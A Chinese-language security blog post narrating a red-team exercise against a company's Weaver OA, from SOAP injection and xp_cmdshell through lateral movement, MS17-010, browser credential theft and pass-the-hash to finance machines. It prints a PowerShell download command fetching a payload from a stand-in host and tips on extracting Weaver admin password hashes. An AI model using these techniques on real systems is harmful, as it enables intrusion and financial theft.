什么？一次红队行动差点让我财富自由了

某月，领导又派本安服仔又来参加攻防演练了，瑟瑟发抖的来到现场，心中默默祈祷这次分目标运气能好一点

拿到⽬标清单，⼀眼望过去⼼就凉了半截，全是gov和零星⼏个⺠营企业。经过⼏年的轮番轰炸，政务⽹已经可以算是地狱难度的内⽹了，⽽且设备基本⻬全，哪哪都有探针甚⾄还有蜜罐，以⾄于没有了在gov开点的欲望。

⼏个私企在简单的收集后也是有喜有悲，好消息是其中⼀家某控股集团互联⽹暴露着泛微oa，坏消息是这个泛微oa版本最新⽽且有rasp防护着。

天崩开局下只能做更细致的信息收集了，⼦域名、全端⼝、全资控股、供应链、钓⻥ N板斧挨个上，终于在扫描全端⼝时有了新发现，在某个⼦域名的29080端⼝开着另外⼀个oa也是泛微的。根据经验判断，这应该是测试环境的了，测试环境往往是安全最容易忽略的⼀环，果不出其然，这个站存在soap注⼊和另外⼀个1day接⼝的堆叠⼊，利⽤xpcmd就能执⾏命令。因为有杀软，mshta和powershell都没法直接上线。我⼀般是会使⽤powershell

拉取oss上的免杀⻢执⾏，拉取命令为:

Invoke-WebRequest -Uri 'http://example.com/file.zip' -OutFile 'C:Downloadsfile.zip'

激动的心，颤抖的手，复制粘贴到命令行中，回车启动

成功上线

嘿嘿，小内网，喜不喜欢爸爸的大cs，嗯？说话

不可否认，进内⽹直接⽤⼊⼝机器扫扫扫是⼀个很不好的习惯，⼀旦被发现踢出内⽹连⼝⼦都会⼀起丢了。我个⼈⼀般是优先翻配置⽂件，⼀般oa的⼊⼝数据库都是站库分离的⽽且基本都是sa权限的sql server，可以直接打。不管是mdut还是msf打clr正向shell都很⽅便。在控住另外⼀台机器后再在上⾯搭建正向代理，拿它作为跳板机扫描，从⽽可以降低被运维发现从⽽提出内⽹再也进不来的⻛险。

一个小tips

泛微的后利⽤总结起来⼀般就：weaver.properties获取数据库配置，数据库内HrmResourceManager可以拿到sysadmin的密码hash，普通⽤户信息则在HrmResource。解出hash就能登进去进⼀步发邮件或者流程⽔坑打运维啦。

听懂掌声👏👏👏

成功登陆

在拿到新跳板机之后，便开始alive探活、fscan、zaku三板斧，在内⽹⾥扫出来好⼏个17-010，但是只成功利⽤msf拿下⼀台，发现是⼀台财务的办公机。

从财务办公机浏览器收集到很多保存的密码，拿到了⾦蝶云和⽣产环境oa的权限

⾄于别的010，在与某位练习时⻓两年半不愿透露姓名的⼤佬沟通中得知，可能是因为之前被打过了存在内核后⻔所以⽆法打⼊新的，并在这位⼤佬的协助下clear掉了原有的后⾯并⼿⼯打⼊了⾃⼰的shellcode，上线cs抓取明⽂密码，PTH撞出四台，⼀台⼀台登录发现是财务机，上⾯登录着企业⽹银，余额上亿。

嘿嘿，此时我有一个大胆的想法

已经开始幻想身价上亿之后，香车美女，豪宅别墅，正当我想的流哈喇子的时候，突然想到.....

还是老老实实写报告吧，最后奉劝大家，渗透不规范，亲人两行泪，一定要遵纪守法啊各位大黑客。

技术交流/加群聊

技术群聊已满200人 群内各种福利 欢迎各位师傅进群交流

原文始发于微信公众号（LK安全）：什么？一次红队行动差点让我财富自由了